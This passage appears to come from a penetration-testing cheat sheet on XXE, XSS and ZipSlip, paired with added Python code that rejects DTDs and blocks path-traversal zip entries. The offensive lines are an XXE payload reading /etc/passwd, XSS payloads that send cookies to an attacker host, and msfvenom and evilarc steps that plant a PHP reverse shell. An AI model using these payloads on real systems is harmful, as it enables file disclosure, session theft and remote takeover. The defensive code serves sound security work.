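                 '<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>'
                 '<Content><Author>&xxe;</Author><Subject>exploit</Subject></Content>')
CLEAN = '<Content><Author>alice</Author><Subject>hello</Subject></Content>'

# Any DTD is refused outright; this also shuts the door on entity-expansion
# (billion laughs) documents, which need no SYSTEM identifier at all.
DTD_RE = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def parse_untrusted(text: str):
    """Parse XML from an untrusted source, rejecting any document that carries a DTD."""
    if DTD_RE.search(text):
        raise ValueError("DTD declarations are not accepted from untrusted input")
    return ET.fromstring(text)


def classify(text: str) -> str:
    """'rejected' for documents with a DTD, otherwise the tag of the root element."""
    try:
        return parse_untrusted(text).tag
    except ValueError:
        return "rejected"


if __name__ == "__main__":
    for name, doc in (("external entity", EXTERNAL_ENTITY), ("nested entity", NESTED_ENTITY), ("clean", CLEAN)):
        print(f"{name:16} -> {classify(doc)}")
```

Python's own documentation notes that the xml modules are not hardened against malicious input, which is why the check runs before parsing rather than relying on parser flags; the defusedxml package is the maintained alternative when DTDs cannot simply be refused.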


XSS


Advanced XSS

<script>alert("XSS")</script>

<iframe SRC="http://<lhost>/report" height = "0" width ="0"></iframe>

<script> new Image().src="http://<lhost>/bogus.php?output="+document.cookie; </script>


ZipSlip


ZipSlip
evilarc

msfvenom -p php/meterpreter/reverse_tcp LHOST=<lhost> LPORT=<lport> > shell.php

python evilarc.py -f shell.zip -o unix -p "../../../../../../var/www/html" shell.php

./handler.sh php/meterpreter/reverse_tcp <lhost> <lport>

→ Upload shell.zip
→ Trigger meterpreter shell by browsing to it
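The archive produced by the steps above carries an entry name that climbs out of the extraction directory. As an added example that is not part of the original page or of evilarc, the Python below builds such an archive in memory (with harmless contents), shows how to spot the offending entry, and extracts only the entries that resolve inside the destination. The archive contents and entry names are constructed.

```python
import io
import os
import tempfile
import zipfile


def build_sample_zip() -> bytes:
    """Constructed archive: one ordinary entry and one whose name escapes the destination."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "hello\n")
        zf.writestr("../../outside.txt", "escaped\n")
    return buf.getvalue()


def is_within(dest: str, member: str) -> bool:
    """True if dest/member, after symlink and '..' resolution, still lies under dest."""
    dest_abs = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(dest_abs, member))
    return os.path.commonpath([dest_abs, target]) == dest_abs


def unsafe_entries(zip_bytes: bytes, dest: str) -> list:
    """Entry names that would be written outside dest."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [info.filename for info in zf.infolist() if not is_within(dest, info.filename)]


def safe_extract(zip_bytes: bytes, dest: str) -> list:
    """Extract entries that stay under dest, skipping the rest; return the names written."""
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not is_within(dest, info.filename):
                continue  # never trust the name in the archive
            target = os.path.realpath(os.path.join(dest, info.filename))
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(info.filename)
    return written


def demo() -> dict:
    """Run the check and the extraction against the sample archive in a fresh directory."""
    dest = tempfile.mkdtemp(prefix="unzip-")
    data = build_sample_zip()
    return {
        "unsafe": unsafe_entries(data, dest),
        "written": safe_extract(data, dest),
        "readme_exists": os.path.isfile(os.path.join(dest, "docs", "readme.txt")),
        "escaped_exists": os.path.exists(os.path.join(dest, "..", "..", "outside.txt")),
    }


if __name__ == "__main__":
    print(demo())
```

CPython's own ZipFile.extractall rewrites such names, but hand-rolled loops that open os.path.join(dest, name) directly, and extraction code in many other languages and libraries, do not; the containment check is what makes the difference.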